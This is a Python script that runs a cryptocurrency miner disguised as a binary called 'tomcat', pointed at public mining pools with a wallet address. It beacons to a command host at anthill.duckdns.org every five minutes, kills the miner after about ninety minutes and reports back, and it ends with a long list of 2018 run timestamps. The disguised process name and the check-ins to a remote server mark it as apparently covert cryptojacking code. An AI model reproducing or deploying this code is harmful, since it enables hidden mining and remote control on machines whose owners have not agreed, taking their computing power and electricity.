import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:04.562487
#2018-02-17 16:23:07.688950
#2018-02-17 18:09:07.089371
#2018-02-17 19:57:06.203064
#2018-02-17 21:45:01.699570
#2018-02-17 23:29:04.991707
#2018-02-18 01:19:04.876921
#2018-02-18 03:06:04.887407
#2018-02-18 04:53:05.714474
#2018-02-18 06:43:05.609047
#2018-02-18 08:33:06.379475
#2018-02-18 10:20:05.594298
#2018-02-18 12:06:06.193526
#2018-02-18 13:51:04.065214
#2018-02-18 15:43:01.363687
#2018-02-18 17:33:01.264805
#2018-02-18 19:19:01.872284
#2018-02-18 21:05:06.344736
#2018-02-18 22:52:07.639808
#2018-02-19 00:40:01.448667
#2018-02-19 02:26:04.442578
#2018-02-19 04:13:07.110240
#2018-02-19 05:57:06.399017
#2018-02-19 07:47:05.355194
#2018-02-19 09:37:07.713962
#2018-02-19 11:27:01.728081
#2018-02-19 13:16:01.328970
#2018-02-19 15:05:08.095388
#2018-02-19 16:54:10.915724
#2018-02-19 18:41:07.050773
#2018-02-19 20:28:07.223255
#2018-02-19 22:16:01.887301
#2018-02-20 00:03:05.223270
#2018-02-20 01:50:01.593914
#2018-02-20 03:38:06.421119
#2018-02-20 05:23:06.999875
#2018-02-20 07:08:05.943595
#2018-02-20 08:54:04.072316
#2018-02-20 10:38:07.683569
#2018-02-20 12:24:05.651564
#2018-02-20 14:13:08.914386
#2018-02-20 15:57:16.055745
#2018-02-20 17:44:06.829270
#2018-02-20 19:36:07.951287
#2018-02-20 21:23:08.104883
#2018-02-20 23:06:06.391344
#2018-02-21 00:51:08.690917
#2018-02-21 02:36:06.694318
#2018-02-21 04:24:07.941816
#2018-02-21 06:12:06.931002
#2018-02-21 07:59:05.339283
#2018-02-21 09:45:02.752832
#2018-02-21 11:34:01.821848
#2018-02-21 13:23:05.805146
#2018-02-21 15:08:01.256378
#2018-02-21 16:57:05.602347
#2018-02-21 18:47:04.904298
#2018-02-21 20:33:08.157867
#2018-02-21 22:21:05.858110
#2018-02-22 00:11:04.513773
#2018-02-22 01:58:07.402333
#2018-02-22 03:46:04.969902
#2018-02-22 05:32:07.268916
#2018-02-22 07:17:08.195048
#2018-02-22 09:05:05.742901
#2018-02-22 10:53:02.216101
#2018-02-22 12:40:09.890985
#2018-02-22 14:27:02.019405
#2018-02-22 16:13:06.417160
#2018-02-22 18:01:02.163898
#2018-02-22 19:49:07.482963
#2018-02-22 21:39:07.624512
#2018-02-22 23:28:05.353064
#2018-02-23 01:18:03.732911
#2018-02-23 03:04:07.927966
#2018-02-23 04:52:06.907999
#2018-02-23 06:38:03.664021
#2018-02-23 08:28:05.358051
#2018-02-23 10:42:05.081544
#2018-02-23 12:40:04.191542
#2018-02-23 14:23:01.635251
#2018-02-23 16:14:08.639659
#2018-02-23 18:01:07.965247
#2018-02-23 19:46:05.095079
#2018-02-23 21:31:05.747856
#2018-02-23 23:19:05.370824
#2018-02-24 01:11:06.925943
#2018-02-24 03:02:03.829880
#2018-02-24 04:48:03.688575
#2018-02-24 06:33:05.279607
#2018-02-24 08:21:05.331446
#2018-02-24 10:04:06.900199
#2018-02-24 12:01:07.472973
#2018-02-24 13:49:06.032039
#2018-02-24 15:37:07.159512
#2018-02-24 17:32:07.416909
#2018-02-24 19:19:03.400375
#2018-02-24 21:09:04.647382
#2018-02-24 23:42:05.274702
#2018-02-25 03:39:05.953175
#2018-02-25 07:18:06.710546